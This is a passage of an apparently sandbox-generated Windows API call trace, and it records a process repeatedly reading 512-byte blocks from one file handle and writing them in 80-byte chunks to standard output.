hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] GetFileType (hFile=0x50) returned 0x1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] GetFileType (hFile=0x50) returned 0x1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] GetFileType (hFile=0x50) returned 0x1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] GetFileType (hFile=0x50) returned 0x1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.021] GetFileType (hFile=0x50) returned 0x1 [0233.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.021] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.021] GetFileType (hFile=0x50) returned 0x1 [0233.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.021] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.021] GetFileType (hFile=0x50) returned 0x1 [0233.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.021] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] GetFileType (hFile=0x50) returned 0x1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.022] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.022] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.022] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.022] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] GetFileType (hFile=0x50) returned 0x1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] GetFileType (hFile=0x50) returned 0x1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] GetFileType (hFile=0x50) returned 0x1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] GetFileType (hFile=0x50) returned 0x1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] GetFileType (hFile=0x50) returned 0x1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] GetFileType (hFile=0x50) returned 0x1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] GetFileType (hFile=0x50) returned 0x1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] GetFileType (hFile=0x50) returned 0x1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.023] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.023] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.023] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.023] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] GetFileType (hFile=0x50) returned 0x1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] GetFileType (hFile=0x50) returned 0x1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] GetFileType (hFile=0x50) returned 0x1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] GetFileType (hFile=0x50) returned 0x1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] GetFileType (hFile=0x50) returned 0x1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] GetFileType (hFile=0x50) returned 0x1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] GetFileType (hFile=0x50) returned 0x1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] GetFileType (hFile=0x50) returned 0x1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.025] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.025] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.025] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.025] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] GetFileType (hFile=0x50) returned 0x1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] GetFileType (hFile=0x50) returned 0x1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] GetFileType (hFile=0x50) returned 0x1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] GetFileType (hFile=0x50) returned 0x1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] GetFileType (hFile=0x50) returned 0x1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] GetFileType (hFile=0x50) returned 0x1 [0233.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] GetFileType (hFile=0x50) returned 0x1 [0233.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] GetFileType (hFile=0x50) returned 0x1 [0233.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.026] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.026] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.026] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.026] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] GetFileType (hFile=0x50) returned 0x1 [0233.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] GetFileType (hFile=0x50) returned 0x1 [0233.026] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.026] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] GetFileType (hFile=0x50) returned 0x1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] GetFileType (hFile=0x50) returned 0x1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] GetFileType (hFile=0x50) returned 0x1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] GetFileType (hFile=0x50) returned 0x1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] GetFileType (hFile=0x50) returned 0x1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] GetFileType (hFile=0x50) returned 0x1 [0233.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.027] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.027] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.027] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.028] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.028] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] GetFileType (hFile=0x50) returned 0x1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] GetFileType (hFile=0x50) returned 0x1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] GetFileType (hFile=0x50) returned 0x1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] GetFileType (hFile=0x50) returned 0x1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] GetFileType (hFile=0x50) returned 0x1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] GetFileType (hFile=0x50) returned 0x1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] GetFileType (hFile=0x50) returned 0x1 [0233.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.028] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] GetFileType (hFile=0x50) returned 0x1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.029] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.029] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.029] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.029] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] GetFileType (hFile=0x50) returned 0x1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] GetFileType (hFile=0x50) returned 0x1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] GetFileType (hFile=0x50) returned 0x1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] GetFileType (hFile=0x50) returned 0x1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] GetFileType (hFile=0x50) returned 0x1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.029] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] GetFileType (hFile=0x50) returned 0x1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] GetFileType (hFile=0x50) returned 0x1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] GetFileType (hFile=0x50) returned 0x1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.030] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.030] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.030] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.030] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] GetFileType (hFile=0x50) returned 0x1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] GetFileType (hFile=0x50) returned 0x1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.030] _get_osfhandle 